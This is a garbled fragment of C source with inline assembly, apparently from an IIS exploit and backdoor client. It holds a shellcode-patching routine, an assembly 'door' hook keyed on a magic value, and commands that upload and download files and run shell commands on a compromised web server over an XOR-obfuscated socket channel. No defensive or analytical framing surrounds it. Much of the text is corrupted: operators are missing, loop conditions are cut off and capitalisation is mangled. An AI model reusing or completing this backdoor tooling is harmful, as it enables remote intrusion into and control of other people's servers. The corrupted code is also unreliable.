hse_io_sy NC); // SleepAdd (100); // k = readclient (connid, buff, & lbytesread); } ELSE i; IF (i> 100) l = 0; } CloseHandleAdd (FPT); L = 0; } Else L = 1; } } IF (k! = 1) { K = 8; WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe K = getLasterRoradd (); While (k == 0x2746) { IF (thisDoor == 1) goto asmreturn; SleepAdd (0x7ffffff); // is dead } } Else { WritefileAdd (hwritepipe2, buff, lbytesread, & lbytead, 0); // SleepAdd (1000); } } } Die: Goto Die; _asm { Asmreturn: MOV EAX, HSE_STATUS_SUCCESS Leave Ret 04 Door: Push EAX MOV EAX, [ESP 0x08] Mov Eax, [EAX 0x64] Mov Eax, [EAX] CMP EAX, 'OK !!' JNZ JMPold POP EAX Push 0x12345678 // dooradd-0x13 RET JMPold: POP EAX Push 0x12345678 // dooradd-0xc Ret // 1 JMP DOOR / / 2 GetDoorcall: Call getDooradd //5 getExceptretadd: POP EAX Push EAX MOV EDI, DWORD PTR [stradd] MOV DWORD PTR [EDI-0X0E], EAX RET Errprogram: MOV Eax, DWORD PTR [ESP 0x0c] Add Eax, 0xB8 Mov DWORD PTR [EAX], 0x11223344 // stradd-0xe XOR Eax, EAX / / 2 Ret // 1 ExecptProgram: JMP errprogram // 2 bytes stradd-7 NextCall: Call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkesp, Int Len) { INT I, K; UNSIGNED CHAR TEMP; Char * Calladd; For (i = 0; i Temp = shellbuff [i]; IF (Temp == 0xE8) {k = * (int *) (ShellBuff i 1); Calladd = fnadd; Calladd = k; Calladd = i; Calladd = 5; IF (calladd == chkesp) { Shellbuff [I] = 0x90; ShellBuff [i 1] = 0x43; // incn Shellbuff [i 2] = 0x4b; // DEC EBX Shellbuff [i 3] = 0x43; Shellbuff [i 4] = 0x4b; } } } } Void Iisput (int FD, Char * STR) { Char * filename; Char * filename2; File * fpt; Char buff [0x2000]; INT size = 0x2000, i, j, filesize, filesishigh; Filename = "/ 0"; Filename2 = "/ 0"; J = Strlen (STR); For (i = 0; i IF (* str! = '') { Filename = STR; Break; } } For (; i IF (* str == '') { * Str = 0; Break; } } i; STR; For (; i IF (* str! = '') { Filename2 = STR; Break; } } For (; i IF (* str == '') { * Str = 0; Break; } } IF (filename == "/ x0") { Printf ("/ n iisput filename [path // fieename] / n"); Return; } IF (filename2 == "/ x0") filename2 = filename; Printf ("/ N Begin Put File:% S", FileName); J = 0; IOCTLSOCKET (FD, Fionbio, & J); Sleep (1000); FPT = CREATEFILE (filename, generic_read, file_share_read, null, open_existing, file _Ttribute_normal, 0); FileSize = GetFileSize (FPT, & FileSizehigh); STRCPY (BUFF, "PUT"); * (int *) (buff 4) = filesis; FileSize = * (int *) (buff 4); STRCPY (BUFF 0x8, filename2); Newsend (FD, BUFF, I 0X9, 0); Printf ("/ N Put File:% S To File:% S% D Bytes", FileName, FileName2, FileSize; Sleep (1000); While (filesis> 0) { Size = 0x800; ReadFile (FPT, BUFF, SIZE, & SIZE, NULL); IF (size> 0) { FileSize- = size; Newsend (FD, BUFF, SIZE, 0); // Sleep (0100); } } // size = filesize; // readfile (FPT, BUFF, SIZE, & SIZE, NULL); // if (size> 0) Send (FD, BUFF, SIZE, 0); CloseHandle (FPT); J = 1; IOCTLSOCKET (FD, Fionbio, & J); Printf ("/ N Put File OK! / N"); Sleep (1000); } Void Iisget (int FD, CHAR * STR) { Char * filename; Char * filename2; File * fpt; Char buff [0x2000]; INT size = 0x2000, i, j, filesize, filesishigh; Filename = "/ 0"; Filename2 = "/ 0"; J = Strlen (STR); For (i = 0; i IF (* str! = '') { Filename = STR; Break; } } For (; i IF (* str == '') { * Str = 0; Break; } } i; STR; For (; i IF (* str! = '') { Filename2 = STR; Break; } } For (; i IF (* str == '') { * Str = 0; Break; } } IF (filename == "/ x0") { Printf ("/ n Iisget filename [path // fieename] / n"); Return; } IF (filename2 == "/ x0") filename2 = filename; Printf ("/ N Begin Get File:% S", FileName); FPT = CREATEFILEA (filename, file_flag_write_through generic_write, file_share_re AD, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); STRCPY (BUFF, "GET"); STRCPY (BUFF 0x4, filename2); Newsend (FD, BUFF, I 0X5, 0); Printf ("/ N get file:% s from file:% s", filename, filename2; J = 0; IOCTLSOCKET (FD, Fionbio, & J); i = 0; FILESIZE = 0; J = 0; While (j <100) { // SLEEP (100); I = NewRecv (FD, BUFF, 0X800, 0); IF (i> 0) { BUFF [I] = 0; IF (Memcmp (BUFF, "SIZE", 4) == 0) {filesize = * (int *) (buff 4); J = 100; } Else { / * For (j = 0; j Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; Buff [J] ^ = LOCKCHARVAR; // DataXorcode; } * / J = 0; Printf ("/ N Recv% S", BUFF); } } Else J; // IF (j> 1000) i = 0; } Printf ("/ n file% D Bytes% D / N", FileSize, i); IF (i> 8) { I- = 8; FileSize- = i; Writefile (FPT, BUFF 8, I, & I, NULL); } While (filesis> 0) { Size = NewRecv (FD, BUFF, 0X800, 0); IF (size> 0) { FileSize- = size; Writefile (FPT, BUFF, SIZE, & SIZE, NULL); } Else { IF (size == 0) { Printf ("/ n ftp close / n"); } Else { Printf ("/ n sleep (100)"); Sleep (100); } } } CloseHandle (FPT); Printf ("/ n get file ok! / n"); J = 1; IOCTLSOCKET (FD, Fionbio, & J); } Void Iisreset (int FD, Char * Str) { Char buff [0x2000]; INT I, J; Printf ("/ NRESET XOR DATA./N); Sleep (1000); J = 0; IOCTLSOCKET (FD, Fionbio, & J); STRCPY (BUFF, "reset"); Newsend (FD, BUFF, STRLEN (BUFF), 0); Sleep (1000); Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; While (1) { J = RECV (FD, BUFF, 0X2000, 0); IF (j> 0) { BUFF [J] = 0; For (i = 0; i IF (buff [i] == 0) BUFF [i] = 'b'; } // Printf ("/ NRECV 0x% x Bytes:% S", J, BUFF); IF (strs ")! = 0) { Printf ("/ Nxor Data RESET OK./N"); For (i = strstr (buff, "xordatareset") - BUFF 0x0c; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; LockCharvar = lockintvar1% 0x100; buff [i] ^ = Lockchaarvar; // DataXorcode; } Break; } } // else if (j == 0) Break; // strcpy (buff, "/ r / nmkdir D: // TEST6 / R / N"); // Newsend (FD, BUFF, STRLEN (BUFF), 0); } Sleep (1000); J = 1; IOCTLSOCKET (FD, Fionbio, & J); // Printf ("aaa"); } Void IISDIE (int FD, Char * STR) { CHAR BUFF [0x200]; Int J; Printf ("/ niis die./n"); J = 0; IOCTLSOCKET (FD, Fionbio, & J); Sleep (1000); STRCPY (BUFF, "IISRR"); Newsend (FD, BUFF, STRLEN (BUFF), 0); Sleep (1000); J = 1; IOCTLSOCKET (FD, Fionbio, & J); Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; } Void iiSCMD (int FD, Char * STR) { Char * cmd = "/ 0"; CHAR BUFF [2000]; INT I, J; J = Strlen (STR); For (i = 0; i IF (* str! = '') { CMD = STR; Break; } } J = Strlen (STR); For (i = 0; i IF (* (STR J-I-1)! = ') { Break; } ELSE * (STR J-I-1) = 0; } IF (cmd == "/ x0") { Printf ("/ niiscmd cmd / n"); Return; } Printf ("/ NBEGIN RUN CMD:% S", CMD); J = 0; IOCTLSOCKET (FD, Fionbio, & J); Sleep (1000); STRCPY (BUFF, "IISC"); STRCAT (BUFF, CMD); Newsend (FD, BUFF, STRLEN (BUFF), 0); Sleep (1000); J = 1; IOCTLSOCKET (FD, Fionbio, & J); / * Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; * / } INT NewRecv (int FD, Char * Buff, Int size, int flag) { INT I, K; K = RECV (FD, BUFF, SIZE, FLAG); IF (xordATABEGIN == 1) { For (i = 0; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode;} } Else { IF (k> 0) { BUFF [K] = 0; IF (strstr (buff, "xordata")! = 0) { XORDATABEGIN = 1; For (i = strstr (buff, "xordata") - BUFF 8; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; } } } } Return (K); } Int Newsend (int FD, CHAR * BUFF, INT SIZE, INT FLAG) { INT I; For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; // buff [i] ^ = DataXorcode; } Return (SEND (FD, BUFF, SIZE, FLAG); } Void Iishelp () { Printf ("/ Nusage:"); Printf ("/ Niisget FileName FileName. Get File from Web Server."); Printf ("/ Niisput FileName FileName. Put File to Web Server."); Printf ("/ Niiscmd CMD. Run CMD on Web Server."); Printf ("/ niisreset. reset the xor data."); Printf ("/ niisdie. reset the asp door."); Printf ("/ n / n"); }
